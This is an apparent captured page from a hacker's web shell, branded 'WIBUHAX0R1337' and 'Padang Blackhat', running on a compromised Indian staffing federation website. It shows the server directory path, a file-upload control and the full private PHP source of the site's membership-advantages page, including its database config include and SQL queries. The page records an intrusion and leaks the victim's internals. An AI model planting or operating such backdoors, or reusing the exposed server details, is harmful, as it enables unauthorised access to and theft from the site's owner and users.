-
✘✘✘ WIBUHAX0R1337 ✘✘✘
-
✘
PATCH :
/
home
/
indianstaffing
/
www
/
Upload File:
files >> /home/indianstaffing/www/membership-advantages.php
<?php include'header.php'; include 'admin/database/config.php'; ?> <style> .blog-wrap { background: #fff; padding: 10px; min-height: 400px; border: 1px solid #00000015; } .blog-wrap.horizontal { background: unset; } .loadComp{ display:none; } .team-wrap { height: 242px; display: flex; justify-content: center; flex-direction: column; align-items: center; border-radius: 15px; } .demand{ width: 235px; height: 85%!important; } /* .demand-img { padding: 20px; */ /*margin: 0rem 0rem 1.5rem 4rem;*/ /* margin-bottom: 1.5rem; height: 110px; line-height: 110px; position: relative; text-align: center; background: #fff; width: 110px; border-radius: 50%; border: 6px solid #000; } .demand-img img{ height: 100%; width: 100%; vertical-align: unset; } */ .code-img{ height: 40%; display: flex; align-items: center; justify-content: center; } .code-img img{ height: 50%; } .team-item-text.demand{ border-radius: 80% 40%; padding-top:0px !important; } .team-details{ padding: 0 20px 0 10px; } .team-details p{ font-size: 14px; } .tablk { max-width: 230px; padding: 0; line-height: 30px; height: 30px; font-size: 13px; border-radius: 8px; cursor: pointer; } .tablk.active { background-color: hsl(214deg 92% 28%); max-width: 230px; color: #fff !important; padding: 0; line-height: 30px; height: 30px; font-size: 13px; border-radius: 8px; } #PROFESSIONALS .list-group-item{ border-top: 0; border-left: 0; border-right: 0; border-radius: unset!important; } </style> <!-- Main content Start --> <div class="main-content"> <!-- Breadcrumbs Section Start --> <div class="rs-breadcrumbs" style="background-color: #003473;"> <div class="container"> <div class="text-center pt-20 pb-20"> <h1 class="breadcrumbs-title white-color mb-0" style="font-size:35px">Membership Advantages</h1> </div> </div> </div> <!-- Breadcrumbs Section End --> <section id='Membership' style="background-color: hsl(205deg 100% 79%); margin:30px 0px 30px 0px"> <div class="container"> <div class="row" STYLE="display: flex; flex-direction: row; padding: 1.5rem 1.75rem; justify-content:space-evenly;text-align:center; color:#000; font-weight:500;"> <div class="col-lg-3 col-md-auto tablk active" onclick="openCity(event, 'STAFFING');"> STAFFING COMPANIES </div> <div class="col-lg-3 col-md-auto tablk" onclick="openCity(event, 'INSTITUTIONAL');"> INSTITUTIONAL MEMBERS </div> <div class="col-lg-3 col-md-auto tablk" onclick="openCity(event, 'CLIENT');"> CLIENT MEMBERS </div> <div class="col-lg-3 col-md-auto tablk" onclick="openCity(event, 'PROFESSIONALS');">PROFESSIONAL MEMBERS</div> </div> </div> </section> <div id="STAFFING" class="tabcnt col-lg-12 pr-40 md-pr-15 md-mb-50 order-2 order-lg-1 order-md-1 "> <!-- <h2 class="text-center">Advocacy</h2> --> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="common-control form-group mb-0 mt-1 mb-3"> <!-- <h5 class=" mt-20" style="font-Weight:600;"> Indian Staffing Federation - Staffing Employment Trends Report- Q2 22-23 </h5> --> <p> Where one company cannot do it alone – We do it together!<br><br> The only association in India to bring staffing professionals and industry experts together to introduce best practices, discuss new ideas and implement solutions to common business challenges. These connections will help you grow your network and expand business opportunities.<br><br> A primary objective of ISF is to actively represent the industry and our membership before governments by providing input on employment legislation and regulations at the national and provincial levels. At the same time, ISF assumes a leadership role in ensuring that industry members are aware of legislation and regulatory changes which may affect their businesses and responsibilities as employers.<br><br> There is strength in numbers. As an ISF member you will be part of a community that will advocate on your behalf and provide you with resources to answer many questions. You will have more time to run your business, knowing that your interests are being protected.<br><br> Professionalism and Industry knowledge makes a difference. Your clients recognize that ISF members are aware of Industry best practices. </p> <div class="row p-2" style="background-color:hsl(214deg 92% 28%);border-radius:5px; color: #fff;"> <div class="col-md-6 text-center">Standard Activities of ISF</div> <div class="col-md-6 text-center">Involvement of Member</div> </div> <?php $selectsql = mysqli_query($con, "SELECT * FROM `membership_advantages` where status=1 and category=1 "); if (mysqli_num_rows($selectsql)>0 ) { while($rows=mysqli_fetch_assoc($selectsql)){ $cat_id = $rows['category']; $sql = mysqli_query($con, "SELECT name FROM `membership_category` where id=$cat_id"); $category=mysqli_fetch_assoc($sql); ?> <div class="row" style="border-bottom:1px solid #D8D6D6;"> <div class="col-md-6"> <p><?=$rows['standard_activities']?></p> </div> <div class="col-md-6"> <p><?=$rows['involvement_member']?></p> </div> </div> <?php }} ?> </div> </div> </div> </div> </div> <div id="INSTITUTIONAL" style="display:none;" class="tabcnt col-lg-12 pr-40 md-pr-15 md-mb-50 order-2 order-lg-1 order-md-1 "> <!-- <h2 class="text-center">Advocacy</h2> --> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="common-control form-group mb-0 mt-1 mb-3"> <!-- <h5 class=" mt-20" style="font-Weight:600;"> Indian Staffing Federation - Staffing Employment Trends Report- Q2 22-23 </h5> --> <p>Institutional members representing associations, federations, trade bodies, educational institutes, NGOs, and other agencies of interest. </p> <div class="row p-2" style="background-color:hsl(214deg 92% 28%);border-radius:5px; color: #fff;"> <div class="col-md-6 text-center">Standard Activities of ISF</div> <div class="col-md-6 text-center">Involvement of Member</div> </div> <?php $selectsql = mysqli_query($con, "SELECT * FROM `membership_advantages` where status=1 and category=2 "); if (mysqli_num_rows($selectsql)>0 ) { while($rows=mysqli_fetch_assoc($selectsql)){ $cat_id = $rows['category']; $sql = mysqli_query($con, "SELECT name FROM `membership_category` where id=$cat_id"); $category=mysqli_fetch_assoc($sql); ?> <div class="row" style="border-bottom:1px solid #D8D6D6;"> <div class="col-md-6"> <p><?=$rows['standard_activities']?></p> </div> <div class="col-md-6"> <p><?=$rows['involvement_member']?></p> </div> </div> <?php }} ?> </div> </div> </div> </div> </div> <div id="CLIENT" style="display:none;" class="tabcnt col-lg-12 pr-40 md-pr-15 md-mb-50 order-2 order-lg-1 order-md-1 "> <!-- <h2 class="text-center">Advocacy</h2> --> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="common-control form-group mb-0 mt-1 mb-3"> <p>Companies who are users of staffing services.</p> <div class="row p-2" style="background-color:hsl(214deg 92% 28%);border-radius:5px; color: #fff;"> <div class="col-md-6 text-center">Standard Activities of ISF</div> <div class="col-md-6 text-center">Involvement of Member</div> </div> <?php $selectsql = mysqli_query($con, "SELECT * FROM `membership_advantages` where status=1 and category=3 "); if (mysqli_num_rows($selectsql)>0 ) { while($rows=mysqli_fetch_assoc($selectsql)){ $cat_id = $rows['category']; $sql = mysqli_query($con, "SELECT name FROM `membership_category` where id=$cat_id"); $category=mysqli_fetch_assoc($sql); ?> <div class="row" style="border-bottom:1px solid #D8D6D6;"> <div class="col-md-6"> <p><?=$rows['standard_activities']?></p> </div> <div class="col-md-6"> <p><?=$rows['involvement_member']?></p> </div> </div> <?php }} ?> </div> </div> </div> </div> </div> <div id="PROFESSIONALS" style="display:none;" class="tabcnt col-lg-12 pr-40 md-pr-15 md-mb-50 order-2 order-lg-1 order-md-1 "> <!-- <h2 class="text-center">Advocacy</h2> --> <div class="container"> <div class="row"> <div class="col-md-12 mb-30"> <p>Professionals who are in the business of consulting, advisory, and other services related to staffing businesses (but do not operate a staffing business).</p> <ul class="list-group" style="font-size:14px;"> <?php $sql1 = mysqli_query($con, "SELECT * FROM `membership_advantages` where status=1 and category=4 "); $check1 = mysqli_num_rows($sql1); if($check1>0){ while ($alldata = mysqli_fetch_assoc($sql1)) { ?> <li class="list-group-item d-flex "> <span> <i class="fa fa-caret-right" style="justify-content:start;"></i> <?=$alldata['standard_activities']?> </span> <!-- <span class="badge badge-primary badge-pill"></span> --> </li> <?php } } ?> </ul> </div> </div> </div> </div> </div> <!-- Main content End --> <?php include'footer.php' ?> <script> function openCity(evt, cityName) { // Declare all variables var i, tabcnt, tablk; // Get all elements with class="tabcnt" and hide them tabcnt = document.getElementsByClassName("tabcnt"); for (i = 0; i < tabcnt.length; i++) { tabcnt[i].style.display = "none"; } // Get all elements with class="tablk" and remove the class "active" tablk = document.getElementsByClassName("tablk"); for (i = 0; i < tablk.length; i++) { tablk[i].className = tablk[i].className.replace("active", ""); } // Show the current tab, and add an "active" class to the link that opened the tab document.getElementById(cityName).style.display = "block"; evt.currentTarget.className += " active"; } </script> <script> $(document).ready(function () { $(".tablk").click(function () { $(".tablk").removeClass("active"); // $(".tab").addClass("active"); // instead of this do the below $(this).addClass("active"); }); }); </script>
2022 - 2023 Copyright By Lutfifakee || Padang Blackhat ♥